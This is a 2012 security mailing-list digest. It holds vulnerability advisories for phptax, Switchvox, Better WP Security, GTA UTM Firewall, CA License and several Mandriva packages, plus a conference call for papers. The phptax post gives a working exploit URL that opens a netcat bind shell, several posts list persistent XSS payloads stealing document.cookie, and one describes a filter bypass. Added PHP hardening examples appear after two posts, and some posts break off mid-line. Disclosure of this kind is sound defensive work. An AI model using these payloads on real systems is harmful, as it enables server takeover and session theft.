phptax 0.8 <= Remote Code Execution Vulnerability

2012-10-02 Thread pereira
-
phptax 0.8 <= Remote Code Execution Vulnerability
-

Discovered by: Jean Pascal Pereira 

Vendor information:

"PhpTax is free software to do your U.S. income taxes. Tested under Unix 
environment.
The program generates .pdfs that can be printed and sent to the IRS. See 
homepage for details and screenshot."

Vendor URI: http://sourceforge.net/projects/phptax/



Risk-level: High

The application is prone to a remote code execution vulnerability.



drawimage.php, line 63:

include ("./files/$_GET[pfilez]");   // $_GET[pfilez] reaches include() unsanitized

// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);   // same unsanitized value, carried into the file names below
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");   // and, via $pfilef/$pfilep, an unquoted shell command



Exploit / Proof of Concept:

Bindshell on port 23235 using netcat:

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make



Solution:

Do some input validation.
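As an added example (not phptax's own code, and not a patch from the project), here is one way the pfilez handling in drawimage.php could be hardened: the parameter is matched against a strict file-name pattern, resolved inside ./files with realpath, and the pdf switch is limited to its two recognised values; the arguments to convert are additionally quoted with escapeshellarg. The accepted name pattern, the function names and the error responses are assumptions.

```php
<?php
// Added example (not phptax code): hardened handling of the pfilez
// parameter from drawimage.php. The original passes $_GET[pfilez]
// unsanitized to include() and into a shell command run by exec().

// Only accept a plain base name ending in .tob, with no path separators
// or shell metacharacters. The pattern is an assumption about phptax's
// naming scheme; adjust it to whatever the application really generates.
function validPfilez(string $name): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9_-]{1,64}\.tob\z/', $name);
}

// Resolve the requested form file strictly inside ./files and confirm it
// exists there, so ../ sequences and absolute paths are rejected even if
// the regex above is later loosened.
function resolveFormFile(string $name, string $baseDir = './files'): ?string
{
    if (!validPfilez($name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name);
    if ($base === false || $path === false) {
        return null;
    }
    // The resolved path must lie below the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$pfilez   = isset($_GET['pfilez']) ? (string) $_GET['pfilez'] : '';
$formFile = resolveFormFile($pfilez);
if ($formFile === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid pfilez');
}

include $formFile;   // defines $image, as in the original

$pfilef = str_replace('.tob', '.png', $pfilez);
$pfilep = str_replace('.tob', '.pdf', $pfilez);

// pdf is compared against a fixed set of values; anything else is refused.
$mode = isset($_GET['pdf']) ? (string) $_GET['pdf'] : '';
if ($mode !== '' && $mode !== 'make') {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid pdf');
}

header('Content-type: image/png');
if ($mode === '') {
    imagepng($image);
}
if ($mode === 'make') {
    imagepng($image, "./data/pdf/$pfilef");
    // Even with the whitelist above, quote each argument individually so
    // the file names can never be interpreted as shell syntax.
    $cmd = 'convert ' . escapeshellarg("./data/pdf/$pfilef")
         . ' ' . escapeshellarg("./data/pdf/$pfilep");
    exec($cmd, $output, $status);
    if ($status !== 0) {
        error_log("convert failed for $pfilef (exit $status)");
    }
}
```

The whitelist on the file name is the primary control, since it governs both the include() target and the shell command; restricting pdf to its two expected values and quoting the convert arguments are defence in depth, so that a later change to the naming rule does not silently reopen the shell sink.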





Reminder: ClubHack2012 Call for Papers Closing Soon

2012-10-02 Thread abhijeet
Hello Everyone, 

This is a gentle reminder that the Call for Papers for ClubHack2012 in Pune, 
India closes on 15th Oct, 2012. Send in your submission as soon as possible.

Call For Participation
==

See http://clubhack.com/2012 for details

In 2012, as ClubHack is focusing toward innovation & leadership, we invite 
papers from enthusiast & seasoned professionals for ClubHack2012 with emphasis 
on entrepreneurship in infosec and security innovation.

These presentations are expected to be of 40 minutes each. The schedule time 
for each presenter would be 50 minutes out of which 40 minutes are for the 
presentation & 10 for the question-answer sessions. We would request you to 
submit the papers keeping the time constraint in mind.

:::Topics:::
Innovation knows no boundaries. Just to spark your thought process, here's a 
hint of topics to which you may refer:
* Entrepreneurship in infosec product development
* Research work in infosec
* Innovation in attack vectors
* Attacks on Cloud
* Mobile computing
* Malware & Botnets
* Privacy with social networks
* Telecom Security (3G/4G, SS7, GSM/CDMA, VoIP) and Phone Phreaking
* Hardware, Embedded Systems and other Electronic Devices Hacking
* War of handhelds & BYOD
* Cyber warfare & your role
* Open Source Intelligence (OSINT)
* Signal Intelligence (SIGINT) : COMINT, ELINT, etc
* Critical Infrastructure Protection
* Security aspects in SCADA and industrial environments and obscure networks
* & the general other infosec domains like web, network, tools & exploits etc.

If you want to deliver a workshop at ClubHack2012, please write to us 
separately and we will help in the same.

:::Submission Deadline:::
October 15, 2012

:::How to Submit:::
Please send us your entries to c...@clubhack.com

For more information regarding CFP please visit http://clubhack.com/2012/cfp/

For conference related information please visit the conference web site - 
http://clubhack.com/2012 
OR
contact us via email - i...@clubhack.com

Hope to see your contribution and support for ClubHack2012.

-- 
Abhijeet Patil
ClubHack
http://clubhack.com


Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities

2012-10-02 Thread Vulnerability Lab
Title:
==
Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities 


Date:
=
2012-09-10


References:
===
http://www.vulnerability-lab.com/get_content.php?id=700


VL-ID:
=
700


Common Vulnerability Scoring System:

4.1


Introduction:
=
Switchvox is based on the open source IP PBX, Asterisk, and the Linux operating 
system. It provides an easy 
to deploy solution for businesses looking for the power of an enterprise PBX 
with high reliability, excellent support, 
and low cost. The simple point-and-click online interface allows virtually 
anyone to set up and manage the system, 
and because it comes as a pre-configured turnkey package, the server and phones 
are all plug and play. Switchvox now 
offers a free edition. This edition is limited to 15 Extensions (Requires Free 
registration) and does not support the 
digital Digium cards, other than that it is similar to the SOHO version.

Switchvox supports unlimited extensions and has all the basic features that 
you'd expect from a PBX, like voicemail, 
custom music on hold, time based behaviors, conferencing, call parking, 
intercom and paging. It also includes features 
that are typically associated with expensive enterprise systems, such as ACD 
queues, find me/follow me functionality, 
unlimited powerful IVR menus that can interact with your company's databases 
(Press one for sales or please enter your 
account number followed by the pound key...), MS Outlook integration, and 
advanced call reporting.

Starting at $995, Switchvox is suitable for businesses of one person to 
hundreds looking to elevate their communication, 
improve productivity, and save money on long distance charges. Switchvox 
supports VoIP, regular phone lines, and voice 
T1 connections, so that your business can configure the system to best handle 
your typical calling behavior.

(Copy of the Vendor Homepage: http://www.switchvox.com/ )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple persistent web 
vulnerabilities in the Switchvox Appliance with Asterisk v5.1.2.


Report-Timeline:

2011-09-10: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the 
Switchvox Appliance with Asterisk v5.1.2.
The bugs allow remote attackers to implement/inject malicious script code on 
the application side. The vulnerabilities are 
located in setup and tools modules of the admin panel. Successful exploitation 
of the vulnerability can lead to session 
hijacking (manager/admin) or stable context manipulation. Exploitation requires 
low user interaction & a low or medium 
privileged web application user account.


Vulnerable Module(s): 
[+] Tools -> Sound Manager -> Create sound 
[+] Tools -> SugarCRM switchboard Panel -> setup
[+] Setup -> Groups -> Create Extension Group
[+] Setup -> Outgoing calls -> Create Outgoing 
Call rule
[+] Setup -> Incoming Calls -> Caller DID 
routes -> Create Single DID Route
[+] Setup -> Incoming Calls -> Caller ID Rules 
-> Create Call transfer Call

Vulnerable Parameter(s):
[+] [Description]
[+] [SugarCRM Web URL] [SugarCRM SOAP URL] 
[+] [Note]


Proof of Concept:
=
The persistent vulnerabilities can be exploited by a local low privileged user 
account with low or medium required user interaction. 
For demonstration or to reproduce ...

Review: Tools -> Sound Manager -> Create sound [Description]
PoC: http://www.vulnerability-lab.com"; 
onload=alert(document.cookie)> 

Review: Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] 
[SugarCRM SOAP URL]   --> to see the poc press on test CRM Settings

PoC: http://www.vulnerability-lab.com"; 
onload=alert(document.cookie)> 

Review: Setup -> Groups -> Create Extension Group [Note]
PoC: http://www.vulnerability-lab.com"; 
onload=alert(document.cookie)> 

Review: Setup -> Outgoing calls -> Create Outgoing Call rule [Note]
PoC: http://www.vulnerability-lab.com"; 
onload=alert(document.cookie)> 

Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route 
[Note]
PoC:http://www.vulnerability-lab.com"; 
onload=alert(document.cookie)>  

Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call 
[Note]
PoC: http://www.vulnerability-lab.com"; 
onload=alert(document.cookie)>

1- Tools -> Sound Manager -> Create sound [Description]
2- Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM 
SOAP URL]   --> to see the poc press on test CRM Settings
3- Setup -> Groups -> Create E

CA20121001-01: Security Notice for CA License

2012-10-02 Thread Williams, James K


CA20121001-01: Security Notice for CA License

Issued: October 01, 2012


CA Technologies Support is alerting customers to two potential risks in CA 
License (also known as CA Licensing).  Vulnerabilities exist that can 
allow a local attacker to execute arbitrary commands or gain elevated 
access.  CA Technologies has issued patches to address the vulnerabilities.

The first vulnerability, CVE-2012-0691, occurs due to insecure use of 
system commands.  An unprivileged user can exploit this vulnerability to 
execute commands with system or administrator privileges.

The second vulnerability, CVE-2012-0692, occurs due to inadequate user 
validation.  An unprivileged user can exploit this vulnerability to create 
or modify arbitrary files and gain elevated access.


Risk Rating

High


Affected Platforms

AIX 5.x
DEC
HP-UX
Linux
Mac OS X
Solaris
Windows


Affected Products

CA Aion Business Rules Expert r11.0
CA ARCserve Backup r12.5, r15, r16
CA ARCserve Central Protection Manager r16
CA ARCserve Central Reporting r16
CA ARCserve D2D r15, r16, r16 On Demand
CA ARCserve Central Host Based VM Backup  (formerly CA ARCserve Host Based 
   VM Backup) r16
CA ARCserve Central Virtual Standby (formerly CA ARCserve Virtual 
   Conversion Manager) r16
CA Automation Point r11.2, r11.3
CA Client Automation (formerly CA Desktop and Server Management) r12.0, 
   r12.0 SP1, r12.5
CA Common Services (CCS) r11.2 SP2
CA ControlMinder (formerly CA Access Control) 12.5, 12.6
CA ControlMinder for Virtual Environments (formerly CA Access Control for 
   Virtual Environments) 2.0
CA Database Management r11.3, r11.4, r11.5
CA Directory 8.1
CA Easytrieve for Windows and UNIX 11.0, 11.1
CA Easytrieve for Linux PC 11.6
CA Erwin Data Modeler r7.x
CA Fast Unload for Distributed Databases 11.3, 11.4, 11.5
CA Gen r8
CA IdentityMinder (formerly CA Identity Manager) r12 CR16 and earlier
CA Insight Database Performance Manager 11.3, 11.4, 11.5
CA IT Asset Manager (ITAM) r12.6 and earlier
CA IT Client Manager r12.0, r12.0 SP1, r12.5
CA IT Inventory Manager r12.0, r12.0 SP1, r12.5
CA NSM r11.0, r11.1, r11.2, r11.2 SP1, r11.2 SP2
CA Output Management Web Viewer 11.5
CA Plex r6, r6.1
CA Repository for Distributed Systems r2.3
CA Service Accounting r12.5, r12.6
CA Service Catalog r12.5, r12.6
CA Service Desk Manager r12.1, r12.5, r12.6
CA Single Sign-On (SSO) r8.1, r12.0, r12.1 CR4 and earlier
CA Software Change Manager 12.0 FP2, 12.1, 12.1 SP1, 12.1 SP2, 12.1 SP3
CA Software Compliance Manager r12.0, r12.6
CA Storage Resource Manager (SRM) 11.8, 12.6
CA TSreorg for Distributed Databases 11.3, 11.4, 11.5
CA Unicenter Asset Portfolio Management r11.3, r11.3.4, r12.6
CA Workload Automation AE 4.5.0, 4.5.1, r11, r11.3
CA Workload Automation DE r11.3
CA XCOM Data Transport Gateway PC Linux r11.5
CA XCOM Data Transport Gateway Windows r11.5
CA XCOM Data Transport for PC Linux r11.5
CA XCOM Data Transport for Windows r11.5
CA XCOM Data Transport Management Center for PC Linux r11.5
CA XCOM Data Transport Management Center for Windows r11.5


Affected Components

CA License 1.90.02 and earlier


Non-Affected Products

CA ControlMinder (formerly CA Access Control) 12.6 SP1
CA Client Automation 12.5 SP1
CA Directory r12.0 SP1 or later
CA Gen r8.5
CA IdentityMinder (formerly CA Identity Manager) r12.5
CA IT Client Manager r12.5.SP1
CA IT Inventory Manager r12.5.SP1
CA Plex r7.0
CA Service Accounting r12.7
CA Service Catalog r12.7
CA Service Desk Manager r12.7
CA Single Sign-On (SSO) r12.1 CR5
CA Storage Resource Manager (SRM) 12.6 SP1
CA Workload Automation DE r11.1 (does not use CA License)


Non-Affected Components

CA License 1.90.03 or later


How to determine if the installation is affected

All versions of CA License before 1.90.03 are vulnerable.

The installed version of CA License can be obtained by using the 
“lic98version” program.  Lic98version retrieves the version of CA License 
installed on a machine along with the version of specific individual files.
The version information is written to the lic98version.log file located in 
the CA License installation location, and is also displayed on the console. 


Solution

CA has issued patches to address the vulnerability.


For all CA product installations on Linux, please note these Linux-specific 
instructions:

1.  First, make backups of the ca.olf file and the lic98.dat file.
2.  Uninstall the existing/old version of CA License.
3.  Perform the installation of CA License 1.90.04.
4.  Confirm the successful installation of 1.9.04, and then replace the 
existing ca.olf file and lic98.dat file with the files you backed 
up in step 1.

If additional information is required, please contact CA Technologies 
Support at https://support.ca.com/ 


CA Aion Business Rules Expert r11.0:
Download and install CA License v1.90.04 or later for Windows and Linux 
platforms, or v1.90.03 or later for all other platforms:
https://support.ca.com/irj/portal/anonymous/phpsup

Better WP Security v3.4.3 Wordpress - Web Vulnerabilities

2012-10-02 Thread Vulnerability Lab
Title:
==
Better WP Security v3.4.3 Wordpress - Web Vulnerabilities


Date:
=
2012-08-20


References:
===
http://www.vulnerability-lab.com/get_content.php?id=691


VL-ID:
=
691


Common Vulnerability Scoring System:

3.5


Introduction:
=
plugin thereby ensuring that as many security holes as possible are patched 
without having to worry about 
conflicting features or the possibility of missing anything on your site. With 
one-click activation for most 
features as well as advanced features for experienced users Better WP Security 
can help protect any site.

(Copy of the Vendor Homepage: 
http://wordpress.org/extend/plugins/better-wp-security/  )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple persistent web 
vulnerabilities in the Better WP security v3.4.3 Wordpress Application Addon.


Report-Timeline:

2012-08-21: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the Better 
WP security v3.4.3 Wordpress Application Addon.
The vulnerability allows remote attackers to hijack website customer, moderator 
or admin sessions with medium or high required user 
interaction. The bugs are located on the server side in the Limit Login Attempts, 
Exception Handling Error & Intrusion Detection modules, with the 
bound vulnerable email address & error parameters. Successful exploitation can 
result in wordpress application account theft, client-side 
phishing & client-side content request manipulation. Exploitation requires 
medium or high user interaction & no privileged 
web application user account.

Vulnerable Module(s):
[+] Better WP Security - Limit Login Attempts & 
Intrusion Detection
[+] Exception Handling Error

Vulnerable Parameter(s):
[+] Email Address
[+] Error


Proof of Concept:
=
The persistent vulnerability can be exploited by remote attackers with low 
required user interaction & a low privileged 
application user account. For demonstration or to reproduce ...

Inject the following example string to the application input (persistent) or 
parameter (client side)
String:  >"http://www.vulnerability-lab.com>


Review: Listings



Email Address



<[PERSISTENT INJECTED SCRIPT CODE!]")' <="" ad...@vulnerability-lab.com"="">


Review: Exception Handling

Attention !
Please add this site now to your http://managewp.com/wp-admin";>ManageWP.com account.  
Or deactivate the Worker plugin to avoid http://managewp.com/user-guide/security";>security issues. 
Login time period needs to be aan 
integer greater than 0.
\"><[PERSISTENT INJECTED SCRIPT CODE!]")' 
<="" is="" 
not="" a="" valid="" ip.<="" p="">


Solution:
=
The vulnerabilities can be patched by parsing the email address & error 
exception handling parameters and output listing.
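The fix both advisories point at is the same one: validate structured input (the email address) before it is stored, and HTML-encode every stored value (Description, Note, error text) when it is written back into a page. The following is an added example, not code from Switchvox, Better WP Security or Vulnerability-Lab, that shows that pattern in PHP for the three kinds of field named in the Switchvox and Better WP Security advisories above; the function names and the sample values are constructed for illustration.

```php
<?php
// Added example (not Switchvox or Better WP Security code): server-side
// handling for the kinds of fields the two advisories name as vulnerable:
// free-text labels (Description / Note), an e-mail address, and an error
// message that is echoed back to the user.

// Free-text fields: store them within a length limit and always
// HTML-encode on output. ENT_QUOTES also encodes ' and ", so a value
// cannot break out of an attribute such as value="...".
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// E-mail field: reject anything that is not syntactically an address
// before it is stored, so the listing never holds markup in that column.
function validateEmail(string $value): ?string
{
    $email = filter_var(trim($value), FILTER_VALIDATE_EMAIL);
    return $email === false ? null : $email;
}

// Error messages: never interpolate raw user input into a message string.
// Keep a fixed catalogue and encode whatever user value is shown with it.
function errorMessage(string $code, string $userValue = ''): string
{
    $catalogue = [
        'bad_ip'     => 'is not a valid IP.',
        'bad_period' => 'Login time period needs to be an integer greater than 0.',
    ];
    $text = $catalogue[$code] ?? 'Request rejected.';
    return $userValue === ''
        ? encodeForHtml($text)
        : encodeForHtml($userValue) . ' ' . encodeForHtml($text);
}

// Render one row of a listing. Every cell and every attribute value goes
// through the encoder; nothing stored is written out raw.
function renderRow(string $description, string $note): string
{
    return '<tr><td>' . encodeForHtml($description) . '</td>'
         . '<td><input type="text" value="' . encodeForHtml($note) . '"></td></tr>';
}

// Constructed sample values of the shape the advisories describe.
$description = '"><script>alert(document.cookie)</script>';
$badEmail    = '"><script>alert(document.cookie)</script>';

echo renderRow($description, 'weekly sales call'), "\n";

// The first value has no @ and is refused; the second is returned as given.
$rejected = validateEmail($badEmail);
$accepted = validateEmail('ops@example.com');
var_dump($rejected, $accepted);

echo errorMessage('bad_ip', $description), "\n";
```

Encoding at output time is what closes the persistent variant: the injected string may still sit in the database, but once every listing and error page runs it through encodeForHtml the browser renders it as text rather than as a tag or an attribute. Input validation on the email field is an additional layer, not a substitute, because the Description and Note fields legitimately accept arbitrary text.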


Risk:
=
The security risk of the persistent input validation vulnerabilities is 
estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Labora

GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities

2012-10-02 Thread Vulnerability Lab
Title:
==
GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities


Date:
=
2012-09-10


References:
===
http://www.vulnerability-lab.com/get_content.php?id=579


VL-ID:
=
579


Common Vulnerability Scoring System:

4


Introduction:
=
The GTA family of Internet security firewall UTM systems has been expanded to 
include three new gigabit appliances. 
The GB-2500 Firewall UTM Appliance is one of GTA's most capable firewalls, 
designed for businesses with extensive 
network demands. Featuring a powerful Intel Dual-Core processor, two gigabits 
of RAM and four gigabits of static
 memory, the GB-2500 easily handles intensive, resource-demanding network 
configurations. The GB-2100 Firewall UTM 
Appliance provides robust protection and network reliability for SME 
organizations. Featuring flexible configuration 
options, straightforward implementation and uncomplicated maintenance and 
monitoring, the GB-2100 presents 
comprehensive protection that is adaptable to any network environment. The 
GB-820 Firewall UTM Appliance is designed 
for smaller offices, providing gigabit performance with all the features and 
tools available in larger appliances, 
but in a space-saving desktop unit. Built-in VPN acceleration provides the 
GB-820 with increased throughput, allowing 
organizations to easily handle periods of increased VPN activity.

All GTA Firewall UTM Appliances include our advanced firewall features - policy 
based NAT, virtual hosting via IP 
Aliasing, advanced routing such as BGP and Single-Sign on authentication - at 
no extra charge. Threat management 
features include DoS and an Intrusion Prevention System (IPS), basic content 
filtering and advanced email gateway features.

(Copy of the Vendor Homepage: http://www.gta.com )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web 
Vulnerabilities in the GTA UTM Firewall Firmware GB 6.0.3.


Report-Timeline:

2012-05-20: Researcher Notification & Coordination
2012-05-21: Vendor Notification
2012-09-10: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Global Technology Associates Inc
Product: UTM Firewall Appliance Application vGB 6.0.3


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the GTA 
UTM Firewall Appliance Application Firmware GB 6.0.3.
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent). 

The first vulnerability is located in the user remote password and pre-shared 
secret input fields & user account output listing. 
The second vulnerability is located in the VPN Certificate emailAddress & 
subject, with effect on the VPN Details Listing section. 

Successful exploitation of the vulnerability can lead to session hijacking 
(manager/admin), persistent phishing & stable (persistent) 
web context manipulation in vulnerable modules or bound application sections. 
Exploitation requires low or medium user interaction & 
a low or medium privileged web application user/manager account.


Vulnerable Module(s):
[+] Users - [Configure -> Accounts -> Users] -  
> Remote Access > L2TP / PPTP > Remote Password
[+] Users - [Configure -> Accounts -> Users] -  
> Mobile IPSEC > Modify & ASCII  > Pre-shared Secret
[+] VPN Certificate - Input & Listing


Video(s): 
[+] 
http://www.vulnerability-lab.com/get_content.php?id=629


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by remote 
attackers with a privileged user account & low 
required user interaction. For demonstration or to reproduce ...

Note:
To bypass the invalid argument filter exception use an onload iframe to request 
your external content with cookies. Standard frames 
and script tags with double quotes will be blocked by the invalid argument 
exception & validation. To verify the bypass use also the 
wrong standard strings for the invalid argument validation.


Locations:  remotePW_hidden, identity, form input desc, 
fullName, Pre-shared Secret, & emailAddress
Good Example Bypass String: ">http://www.vuln-lab.com 
onload=alert("GTA") < or ">http://www.vuln-lab.com 
onload=alert(document.cookie) <
Wrong Example Bypass String:>"http://google.com> or 
alert("TEST")


Review: Users - [Configure -> Accounts -> Users] -  > Remote Access > L2TP / 
PPTP - Password

... & fullName

... & desc

... or the secret_hidden

<[PERSISTENT SCRIPT CODE!])' 
<"=""><


URL:http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3





Review: VPN Certificate - Details Listing


Subject:
emailAddress = "\"><[PERSISTENT SCRIPT CODE

[ MDVSA-2012:155-1 ] xinetd

2012-10-02 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2012:155-1
 http://www.mandriva.com/security/
 ___

 Package : xinetd
 Date: October 2, 2012
 Affected: 2011.
 ___

 Problem Description:

 A security issue was identified and fixed in xinetd:
 
 builtins.c in Xinetd before 2.3.15 does not check the service type
 when the tcpmux-server service is enabled, which exposes all enabled
 services and allows remote attackers to bypass intended access
 restrictions via a request to tcpmux port 1 (CVE-2012-0862).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0862
 ___

 Updated Packages:

 Mandriva Linux 2011:
 ae9737040630c36506de75263084f974  2011/i586/xinetd-2.3.14-13.1-mdv2011.0.i586.rpm
 003bb43ec0db849ead63f244416e37f1  2011/i586/xinetd-simple-services-2.3.14-13.1-mdv2011.0.i586.rpm
 b5135fe1b3920a072cfef64fd75bb23e  2011/SRPMS/xinetd-2.3.14-13.1.src.rpm

 Mandriva Linux 2011/X86_64:
 e8989614f21fea3408d240db31545ba3  2011/x86_64/xinetd-2.3.14-13.1-mdv2011.0.x86_64.rpm
 cee089878f49c818ddc456797d79b335  2011/x86_64/xinetd-simple-services-2.3.14-13.1-mdv2011.0.x86_64.rpm
 b5135fe1b3920a072cfef64fd75bb23e  2011/SRPMS/xinetd-2.3.14-13.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFQasj/mqjQ0CJFipgRAvfhAJ9jET5mIV1wFrfFJLUOhr4GWeQkNACfU51E
2D5XXPcnqPXoQR/jkHZzifA=
=/A7l
-END PGP SIGNATURE-



[ MDVSA-2012:156 ] inn

2012-10-02 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:156
 http://www.mandriva.com/security/
 ___

 Package : inn
 Date: October 2, 2012
 Affected: 2011.
 ___

 Problem Description:

 A security issue was identified and fixed in ISC INN:
 
 The STARTTLS implementation in INN's NNTP server for readers, nnrpd,
 before 2.5.3 does not properly restrict I/O buffering, which allows
 man-in-the-middle attackers to insert commands into encrypted sessions
 by sending a cleartext command that is processed after TLS is in place,
 related to a plaintext command injection attack, a similar issue to
 CVE-2011-0411 (CVE-2012-3523).
 
 The updated packages have been upgraded to inn 2.5.3 which is not
 vulnerable to this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3523
 https://www.isc.org/software/inn/2.5.3article
 ___

 Updated Packages:

 Mandriva Linux 2011:
 0fdfb8541c9dde983ada87a196ecc45a  2011/i586/inews-2.5.3-0.1-mdv2011.0.i586.rpm
 60e226fec04eaa464dbe7a5f2c593713  2011/i586/inn-2.5.3-0.1-mdv2011.0.i586.rpm
 47326ed2fb59ccdbaa5e6328e09deb95  2011/i586/inn-devel-2.5.3-0.1-mdv2011.0.i586.rpm
 e42adcff2587362f39488faf96f9c496  2011/SRPMS/inn-2.5.3-0.1.src.rpm

 Mandriva Linux 2011/X86_64:
 f4824198caa2bbc317a14fd592bff6f7  2011/x86_64/inews-2.5.3-0.1-mdv2011.0.x86_64.rpm
 7ac20f123163d73f1dc78757a6c1ed88  2011/x86_64/inn-2.5.3-0.1-mdv2011.0.x86_64.rpm
 eb416372f4e3cebd236a53c89c83eec5  2011/x86_64/inn-devel-2.5.3-0.1-mdv2011.0.x86_64.rpm
 e42adcff2587362f39488faf96f9c496  2011/SRPMS/inn-2.5.3-0.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFQarmImqjQ0CJFipgRAg6IAKDmIgEoq7aEzwTd7EkcUIoenjxywACfSozW
acETQYOqxMaOxt6dNMShDpc=
=d6j2
-END PGP SIGNATURE-



[ MDVSA-2012:152-1 ] bind

2012-10-02 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2012:152-1
 http://www.mandriva.com/security/
 ___

 Package : bind
 Date: October 2, 2012
 Affected: 2011.
 ___

 Problem Description:

 A vulnerability was discovered and corrected in bind:
 
 A nameserver can be caused to exit with a REQUIRE exception if it can
 be induced to load a specially crafted resource record (CVE-2012-4244).
 
 The updated packages have been upgraded to bind 9.7.6-P3 which is
 not vulnerable to this issue.

 Update:

 Packages for Mandriva Linux 2011 are being provided.
 
 The updated packages have been upgraded to bind 9.8.3-P3 which is
 not vulnerable to this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4244
 https://kb.isc.org/article/AA-00778
 ftp://ftp.isc.org/isc/bind9/9.7.6-P3/CHANGES
 ftp://ftp.isc.org/isc/bind9/9.8.3-P3/CHANGES
 ___

 Updated Packages:

 Mandriva Linux 2011:
 ecc7600f8582ac93fe5ebed4ac658c9b  2011/i586/bind-9.8.3-0.0.P3.0.1-mdv2011.0.i586.rpm
 43469a462ceae0a03e7e0474175eaa94  2011/i586/bind-devel-9.8.3-0.0.P3.0.1-mdv2011.0.i586.rpm
 548ec34953809e9f3a7a2336fe3d62c1  2011/i586/bind-doc-9.8.3-0.0.P3.0.1-mdv2011.0.i586.rpm
 cb2dbf102709021d48c60403f7535c9a  2011/i586/bind-utils-9.8.3-0.0.P3.0.1-mdv2011.0.i586.rpm
